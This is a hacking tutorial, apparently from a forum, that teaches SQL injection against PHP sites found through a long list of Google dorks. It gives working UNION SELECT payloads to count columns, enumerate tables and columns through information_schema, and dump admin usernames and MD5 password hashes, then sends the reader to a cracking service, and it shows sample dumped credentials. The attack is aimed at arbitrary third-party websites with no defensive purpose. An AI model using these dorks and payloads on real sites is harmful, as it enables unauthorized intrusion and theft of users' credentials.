1). Search for a vulnerable site.
=======================
Highlight one then press ctrl+c then ctrl+v at google search engine.
allinurl:index.php?id=
allinurl:trainers.php?id=
allinurl:buy.php?category=
allinurl:article.php?ID=
allinurl:play_old.php?id=
allinurl:newsitem.php?num=
allinurl:readnews.php?id=
allinurl:top10.php?cat=
allinurl:historialeer.php?num=
allinurl:reagir.php?num=
allinurl:Stray-Questions-View.php?num=
allinurl:forum_bds.php?num=
allinurl:game.php?id=
allinurl:view_product.php?id=
allinurl:newsone.php?id=
allinurl:sw_comment.php?id=
allinurl:news.php?id=
allinurl:avd_start.php?avd=
allinurl:event.php?id=
allinurl:product-item.php?id=
allinurl:sql.php?id=
allinurl:news_view.php?id=
allinurl:select_biblio.php?id=
allinurl:humor.php?id=
allinurl:aboutbook.php?id=
allinurl:ogl_inet.php?ogl_id=
allinurl:fiche_spectacle.php?id=
allinurl:communique_detail.php?id=
allinurl:sem.php3?id=
allinurl:kategorie.php4?id=
allinurl:news.php?id=
allinurl:index.php?id=
allinurl:faq2.php?id=
allinurl:show_an.php?id=
allinurl:preview.php?id=
allinurl:loadpsb.php?id=
allinurl:opinions.php?id=
allinurl:spr.php?id=
allinurl:pages.php?id=
allinurl:announce.php?id=
allinurl:clanek.php4?id=
allinurl:participant.php?id=
allinurl:download.php?id=
allinurl:main.php?id=
allinurl:review.php?id=
allinurl:chappies.php?id=
allinurl:read.php?id=
allinurl:prod_detail.php?id=
allinurl:viewphoto.php?id=
allinurl:article.php?id=
allinurl:person.php?id=
allinurl:productinfo.php?id=
allinurl:showimg.php?id=
allinurl:view.php?id=
allinurl:website.php?id=
allinurl:hosting_info.php?id=
allinurl:gallery.php?id=
allinurl:rub.php?idr=
allinurl:view_faq.php?id=
allinurl:artikelinfo.php?id=
allinurl:detail.php?ID=
allinurl:index.php?=
…and this one is just priceless…
“login: *†“password= *†filetypels
2)Definitions:
==========
inurl: -> is a search parameter in google so that it searches for results in the site’s url.
.php?5= -> is what i’m searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It’s the part in the site’s url that tells you that it can be vulnerable to a certain SQL injection. Let’s take this exploit for example:
We will check it’s vulnerability by adding magic qoute (‘) at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login–
3) So the url will be like this:
======================
http://www.site.com/news_archive.php?id=5′
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\’;
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.
4) Find the columns :
===============
The next step is find out how many columns the database contain
To find it we use “order by” (without the qoute) and this string ” — ” (no qoute).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1– (no error)
http://www.site.com/news_archive.php?id=6 order by 2– (no error)
http://www.site.com/news_archive.php?id=6 order by 3– (no error)
we move a little higher. (it doesn’t matter)
http://www.site.com/news_archive.php?id=6 order by 10– (no error)
http://www.site.com/news_archive.php?id=6 order by 14– (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15– (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15–;
mySQL Error: 1054 (Unknown column ’15′ in ‘order clause’)
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column ’15′ in ‘order clause’)
this mean the database contain only 14 columns
5)Union select :
===========
Now use “-” (negative quote) and union select statement.
using this we can select more data in one sql statement.
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14–
we hit enter.
numbers appears..
Like this:
6
, 5
8
6) Check MYSQL Version
====================
Now we will check it’s MYSQL VERSION. We will add @@version on the numbers appear on the previous step.
lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14–
and you will get a result like this:
6
, 5
5.1.32 <–this is the version
7) Getting Table Name.
=================
We use group_concat(table_name).
replace @@version with group_concat(table_name)
and look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14–
were not done already: (don’t hit enter)
between number 14 and this “–” (quote) insert this:
+from+information_schema.tables+whe
re+table_schema=database()–
it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()–
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhot o,active_sessions_split,auth_u ser_md5
8) Column Name :
=============
Now we’re done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.
for better result we need to hex auth_user_md5.
Go to this Link: TRANSLATOR, BINARY
p
aste auth_user_md5 to the text box and click encode.
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) to group_concat(column_name).
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_sche ma=database()–
replace also +from+information_schema.tables+where+table_schema =database()–
to
+from+information_schema.columns+where+table_name= 0x617574685f757365725f6d6435–
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_nam e=0x617574685f757365725f6d6435–
Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleNam e,LastName,Position,EmailAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModifi ed,ModifiedBy,Status
9) Main part :
===========
We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..
Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P
assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAd dress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a ,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0×6175 74685f757365725f6d6435– to +from+auth_user_md5–
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5–
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10)Cracking the password :
=====================
Because the password is in md5 hash we need to crack it.
Passwords recovery – MD5, SHA1, MySQL
pass
: x1R0zYB3bex